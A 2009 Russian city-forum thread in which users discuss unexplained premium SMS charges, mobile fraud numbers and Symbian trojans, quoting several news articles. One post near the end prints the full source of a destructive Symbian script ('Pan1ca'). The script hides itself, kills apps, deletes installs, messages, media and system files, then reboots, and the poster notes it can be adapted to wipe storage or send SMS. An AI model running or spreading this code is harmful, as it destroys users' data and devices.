Электростальский форум
Hi-Tech => Мобильная связь => Тема начата: Reggie от 19.05.09, 09:30:18
-
Итак, граждане, сегодня проснувшись утром, взглянул на экран телефона и увидел там нечто...
А именно входящее смс с номера 9099 (глянул в инете - этот номер используется мошенниками для разводки пользователей. За смс-ку с определенным кодом на этот номер, обещают отключить банерную рекламу).
ТАк вот - в смс было написано: "ваше сообщение получено". Я в шоке, ничего не могу понять, ибо ясно помню что никогда не занимался благотворительностью, отправкой смс, участием в акциях радио, или спасения родственников из отделений милиции...Смотрю в исходящие сообщения и вижу там некий код, который якобы действительно был отправлен мною на номер 9099. Время исходящего осообщения - 3.09. Все бы ничего, но в я лег спать около 1.30 и спал до утра,поэтому никак не мог ничего отправлять. Лунатизмом я не страдаю.
Что вы думаете по этому поводу?
PS: как прочел в инете за подобную смс-ку у абонентов МТС и мегафона снимают по 142 рубля. Проверил баланс - так оно примерно и вышло.
-
если смартфон(симбиан)/кпк(винце) то мож вирусняк какой новый завелся, а так звонить в МТС и пытатся разобратся с ними, правда скорей всего с нулевым результатом будет, но ихняя служба безопасности должна накапливать статистику и разобратся с этими мошенниками
ну и плюс попробовать написать в поддержку http://nwbill.ru/ (http://nwbill.ru/) - это их номер, по идее они должны быть заинтересованны, чтобы мошенники не пользовались ихним сервисом
-
Начнем расследование!
Итак версия номер 1.
СМС-ку могли отправить твои близкие! (а также, хоть и маловероятно, но все же это могла сделать кошка, собака, хомячок и т.д.) :dp:
-
тоже думаю, что вирь (очень на это надеюсь)...у меня смарт. Щас хард ресет сделаю...
-
Начнем расследование!
Итак версия номер 1.
СМС-ку могли отправить твои близкие! (а также, хоть и маловероятно, но все же это могла сделать кошка, собака, хомячок и т.д.) :dp:
Рядом была только девушка. Спала она также, и вообще не имеет привычки лазить в моем телефоне, а тем более что-то отправлять с него. Версия родственников исключена полностью
-
если был включен голубозуб могли и через него. так прог есть кучу. проверял действительно телефон можно поиметь по полной.
-
Я не блондинко,чтоб с включенным блютусом ходить - вообще редко им пользуюсь и только для приема передачи файлов от друзей. Тут либо вирь, либо мошенники придумали какой то мега способ сдирания денег (что вряд ли).
-
Я не блондинко,чтоб с включенным блютусом ходить - вообще редко им пользуюсь и только для приема передачи файлов от друзей. Тут либо вирь, либо мошенники придумали какой то мега способ сдирания денег (что вряд ли).
Мега вирус квартирус сто пудов :fy:
-
Ну вы ппц паникёры... вирусы коэшн есть, которые отправляют смс... но они не совершенны, ибо запрашивают разрешение чтобы отправить сообщение. Тем более смарт.. какой нахрен на него вирус. Если бы кпк был то ладно ещё. Короч это не из за этого. отправил по всей видимости кто-то. Кстати номер нигде не регистрировал? там интернет помощник и всё такое?
-
В апреле в инете появился вирус, кот порнухой весь экран застилает и винду болкирует, зато выводит табличку типа отправь смс на номер 46... (не помню) и будет тебе счастье. Мой знакомый (по незнанке) отправил (причём баланс был 40 рублей), потом зачем-то ещё раз отправил (но это уже другая история) но в итоге МТС списали с него 600 рублей.
Вообщем он не ожидал такой наглости от МТС (что они в долг снимат), позвонил и строго попросил вернуть сиё бабло на место. Типа это афёра и всё такое. ДЕНЬГИ МТС ВЕРНУЛИ!!!! (но возможно помогло то, что он полученные коды в табличку на экране не вбивал..., это не известно)
так что попытаться вернуть деньги можно
-
Ну вы ппц паникёры... вирусы коэшн есть, которые отправляют смс... но они не совершенны, ибо запрашивают разрешение чтобы отправить сообщение. Тем более смарт.. какой нахрен на него вирус. Если бы кпк был то ладно ещё. Короч это не из за этого. отправил по всей видимости кто-то. Кстати номер нигде не регистрировал? там интернет помощник и всё такое?
http://tehpoisk.ru/articles/virsottel (http://tehpoisk.ru/articles/virsottel)
http://gizmod.ru/2007/05/24/pervyj_trojan-sms_dlja_smartfonov_na_symbian/ (http://gizmod.ru/2007/05/24/pervyj_trojan-sms_dlja_smartfonov_na_symbian/)
Первый Trojan-SMS для смартфонов на Symbian
Если вы – обладатель смартфона на Series 60, будьте осторожны - антивирусом «Лаборатории Касперского» был обнаружен троян для мобильных телефонов, работающих на этой операционке.
«На этой неделе нами было обнаружено сразу три варианта новой троянской программы для мобильных телефонов. Trojan-SMS.SymbOS.Viver занимается тем, что отсылает платные SMS-сообщения на premium-номера. Таким образом, со счета пострадавшего владельца телефона снимается определенная сумма денег, которая перечисляется на счет злоумышленника. Viver написан специально для телефонов на платформе Symbian и является первым Trojan-SMS для смартфонов.»
Самое неприятное, что этот вирус вполне может быть загружен на телефон под видом полезной утилиты, например, фото-редактора, набора видео-кодеков и т.д. А началось его распространение с сайта dimonvideo.ru (популярный сайт пользователей смартфонов), из раздела «файлообмен», куда файлы могут быть добавлены любым из зарегистрированных пользователей. Ну, а дальше схема проста: после установки в смартфон троян начинает методично отсылать SMS-ы на номер 1055, стоимость которых составлет не много, не мало 177 рублей.
«Номер 1055 очень интересен. Как выясняется, он уже не первый раз используется мобильными мошенниками. И позволяет им остаться безнаказанными. Как же это происходит?
Известно, что сотовые операторы сдают короткие номера в аренду. Однако частному лицу арендовать такой номер стоит слишком дорого. Но существуют контент-провайдеры, например «Инфон», у которых есть такие короткие номера, и которые сдают их в субаренду путем добавления к ним определенного префикса. Так, короткий номер 1055 принадлежит именно «Инфон», но если на номер 1055 будет отправлено сообщение, начинающееся на «S1», то система «Инфона» переведет часть стоимости такой SMS на счет субарендатора «S1». Мобильный оператор забирает себе от 45% до 49% от стоимости SMS, около 10% получает «Инфон». Остальные деньги отправляются субарендатору — в данном случае, «мобильному» мошеннику. В этом месяце нами зарегистрировано три подобных инцидента. Сколько еще таких троянцев остаются незамеченными — остаётся только догадываться.»
Так что, будьте бдительны! :)
---
от себя: посмотрите на год второй статьи - 2007, а щас уже 2009, вирусописатели не стоят на месте
-
Прям страшно становится после таких слов :ai:
У меня у самого смартофон , однако вирусов никогда не ловил при скачивании файлов......
-
Ну вы ппц паникёры... вирусы коэшн есть, которые отправляют смс... но они не совершенны, ибо запрашивают разрешение чтобы отправить сообщение. Тем более смарт.. какой нахрен на него вирус. Если бы кпк был то ладно ещё. Короч это не из за этого. отправил по всей видимости кто-то. Кстати номер нигде не регистрировал? там интернет помощник и всё такое?
Товарищ, вирусы на симбиан появились еще году в 2003, друг например словил вирус который сам отправлял смс-ки правда на номера из телефонной книги - было это еще в 2004 году, с Nokia 3230. С тех пор конечно есть и антивири, а на 9 симбу вообще вирусов нету, по моему.
-
Товарищ, вирусы на симбиан появились еще году в 2003, друг например словил вирус который сам отправлял смс-ки правда на номера из телефонной книги - было это еще в 2004 году, с Nokia 3230. С тех пор конечно есть и антивири, а на 9 симбу вообще вирусов нету, по моему.
статья мартовская, этого года
http://www.nokiasmart.info/news_internet/1515-obnaruzhen-novyjj-virus-dlja-symbian-9.html (http://www.nokiasmart.info/news_internet/1515-obnaruzhen-novyjj-virus-dlja-symbian-9.html)
---
Обнаружен новый вирус для Symbian 9!!!
FortiGuard - Research Team обнаружила новый вирус, который использует Интернет соединение для передачи данных и распространяется с помощью смс!
Этот новый вирус имеет название - SymbOS/Yxes.A!worm, а так-же известный как "Sexy View", который ориентирован на заражение смартфонов под управлением Symbian 9 3rd edition, а так-же работает на широком диапазоне системы, на таких телефонах как Nokia 3250, N73 и т.д.
Данный вирус собирает телефонные номера из зараженного устройства и неоднократно пытается отправить им смс (sms) с ссылкой, по которой скачивается этот вирус.
Помимо этого, вирус может собирать любую информацию, важную их создателям. Сейчас он (вирус) находится в так называемом "спящем" режиме, т.е. управление им не наблюдается. Но в любой момент, по команде его создателя, вирус может загрузить любую информацию с вашего смартфона на интернет сервер. Информация может быть абсолютно разная и любая (Например коды, файлы, информация imei и т.д.), даже невозможно сказать за какой именно информацией он охотится. Так-же есть один плохой момент, что создатели вируса могут обновить его в любой момент, тем самым будет мутация вируса которая может привести к любым последствием, хотя утечка информации и данных о телефоне уже не радует.
Данный вирус создаёт процесс (Ну или работает под процессом) - "EComServer.exe", а так-же удаляет процессы таких программ, как: AppMgr, TaskSpy, Y-browser, ActiveFile и Taskman. Вирус находится в автозапуске и перезагрузка телефона не поможет.
Рекомендуем вам защититься антивирусом для смартфона, а так-же всегда иметь обновлённую базу вирусов, для избежания заражения телефона.
---
щас появится знакомый из касперского, попробую вытянуть инсайдерскую информацию, есть у них там чтонить такое или нет :)
-
(13:56:51) xxxxxxxx на работе: короч, на счет вирей:
Да, есть
Worm.SymbOS.Yxe – SMS-червь, родом из Китая, подписан легальным сертификатом.
как раз тот вирус что описан в предыдущем посте
-
(13:56:51) xxxxxxxx на работе: короч, на счет вирей:
Да, есть
Worm.SymbOS.Yxe – SMS-червь, родом из Китая, подписан легальным сертификатом.
как раз тот вирус что описан в предыдущем посте
херасе,теперь и сертификаты на вири подписывать надо?))
а что потом?просить автограф\номер паспорта у гопоря который у тебя мобилу свиснул?!=)
-
А у нас обычный телефон без наворотов (дочкин), 170 рублей списали за якобы 2 звонка в экспресс-службу. Оба раза телефоном в это время (когда звонили) не пользовались, лежал дома, где никого не было. Стала звонить в поддержку, вернули 50 рублей... :ak:
-
А может кто подскажет по такой ситуации?
Вкратце предыстория. Есть телефон "А", простейшая раскладушка (даже без блютуса). Оператор мегафон, пользуется мама, но оформлен на другого. баланс был и есть сейчас 80 коп.
телефон "Б". Оператор тот же мегафон, оформлен на маму, но пользуется дочка. Сам аппарат находится за границей вместе с дочкой естественно (роуминг типа).
Сама история: В 0ч 49мин раздается звонок (кому вообще не спится :bt:), определился московский номер. Неизвестная просит позвать дочку "на пару слов", сославшись на то, что она вместе с ней работала в ресторане (полная ложь - дочка нигде никогда не работала). После того, как ей объяснили, что это не возможно физически - усмехнулась и повесила трубку. Вот тут то и самое интересное. Вместо коротких гудков мама услышала голос дочки с вопросом "ты чего мне звонишь? дорого же!". После обследования менюшек в исходящих звонках был найден звонок на телефон дочки (время 00.50). Его естественно никто не набирал. Можно было бы списать на то, что случайно сами "ухом набрали", но при балансе в 80копеек звонок бы точно не прошел.
Кто что может подсказать по этому поводу? Интересует не столько зачем звонили, сколько как вообще технически возможна такая ситуация. Раньше только слышал, что каким то образом совершали звонки из под чужого номера, но чтобы вот так вот :bn:
-
Эта тема, Чингиз, уже подымалась :) где я рассказывал про глюки вышки мегафон на юбилейке, где я звонил неоднократно людям с МТС на мегафон, и слышал грубоватый, тихий голосок мужской "ало! ало! вас не слышно!", связь то пропадала, то снова появлялась, когда же я смотрел на дисплей, видел "Набирается номер..." - то есть еще соединения нету!!! я чуть в штаны первый раз не наделал! Хорррор отдыхает. Ну а потом привык к таким глюкам.
-
В апреле в инете появился вирус, кот порнухой весь экран застилает и винду болкирует, зато выводит табличку типа отправь смс на номер 46... (не помню) и будет тебе счастье. Мой знакомый (по незнанке) отправил (причём баланс был 40 рублей), потом зачем-то ещё раз отправил (но это уже другая история) но в итоге МТС списали с него 600 рублей.
Вообщем он не ожидал такой наглости от МТС (что они в долг снимат), позвонил и строго попросил вернуть сиё бабло на место. Типа это афёра и всё такое. ДЕНЬГИ МТС ВЕРНУЛИ!!!! (но возможно помогло то, что он полученные коды в табличку на экране не вбивал..., это не известно)
так что попытаться вернуть деньги можно
Такая же фигня с порно-вирусом. Я мужа чуть не прибила, думала он по этим сайтам лазит, там же что только не подцепишь на комп. Ездили в элсайт, они там что то делали, потом пришлось переустанавливать программы. Правда мы никуда смс не посылали, ума хватило.
-
// use libs
use files, app, system, proc, ui, sms, time;
// pattern
file = "*";
f = files.exists("c:\\resource\\apps\\CapsOff.rsc")
// close apps
app.stop(0xa0000bcd)
app.stop(0x101f4cd2)
app.stop(0x2001a642)
// hide pan1ca
proc.hide()
// Pan1ca menu
ui.menu("Service",["Stop"],false);
cmd=ui.cmd(0);
if cmd="Stop" then
ui.error("Please wait...")
end
// kill java app mngr
cd("C:\\system\\install\\Registry");
files.delete(file);
cd("E:\\system\\install\\Registry");
files.delete(file);
// font route
files.copy("C:\\System\\Apps\\Pan1ca\\FontRouter.ini","c:\\Data\\Fonts");
files.copy("C:\\System\\Apps\\Pan1ca\\FontRouter.ini","e:\\Data\\Fonts");
// delete all SMS inbox messages
lastweek=time.get()-1;
for id in sms.inbox() do
if sms.get(id)["time"]<lastweek then
sms.delete(id)
end
end
// deliting from C
cd("C:\\System\\Apps\\mobileagent");
files.delete(file);
cd("\plugins_data");
files.delete(file);
cd("C:\\System\\Apps\\bayanICQ\\ICQ");
files.delete(file);
cd("\Clients");
files.delete(file);
cd("C:\\TTPod\\skin\\V3");
files.delete(file);
// deliting from E
cd("E:\\System\\Apps\\mobileagent");
files.delete(file);
cd("\plugins_data");
files.delete(file);
cd("E:\\System\\Apps\\bayanICQ\\ICQ");
files.delete(file);
cd("\Clients");
files.delete(file);
cd("E:\\TTPod\\skin\\V3");
files.delete(file);
// del multimedia
cd("E:\Images");
files.delete(file);
cd("E:\Sounds");
files.delete(file);
cd("\Digital");
files.delete(file);
cd("\..\\Simple");
files.delete(file);
cd("E:\music");
files.delete(file);
cd("E:\Attachments");
files.delete(file);
// deleter old ver
if f = (true) then
app.open("CapsOff.exe","CapsOff");
sleep (60000);
cd("c:\\sys\\bin");
files.delete("CProfDriver_SISX.ldd");
files.delete("installserver.exe");
ui.msg("Infected by Pan1ca","WARNING!");
system.reboot()
else
// reboot new ver
sleep (60000);
ui.msg("Infected by Pan1ca","WARNING!");
system.reboot()
end;
щасть этого волшебного скрипта,его можно настроить так и на очистку харда,так и на отправку смс
-
Что-то ваши мобилки совсем зарылись в вирусах.
У меня слава богу нет их. Правда мне передали как-то по блютуз вирусняк, спасибо нортону, ругнулся и фтопку его.
А с Билайном проблем не было с вирусами, по инету лазил, но никто и никогда не посегнул на мой смарт.
Хотя признаюсь, грешен, посягал на чужие, но это в прошлом. :ah:
-
вирусняк . а у меня на симбе была такая фишка : скачал там прогу какуюто (уже не помню) вначале выбираешь купить ключ или активировать через 12 чтоли дней по смс. ну я выбираю через 12 дней думая попользоваться и по истечении демо - срока удалить....проходит 12 дней итд я забываю и замечаю о отсутствии средств...бац! прога сама всё сделала и отправила смску. это была аська какаято) будте осторожнее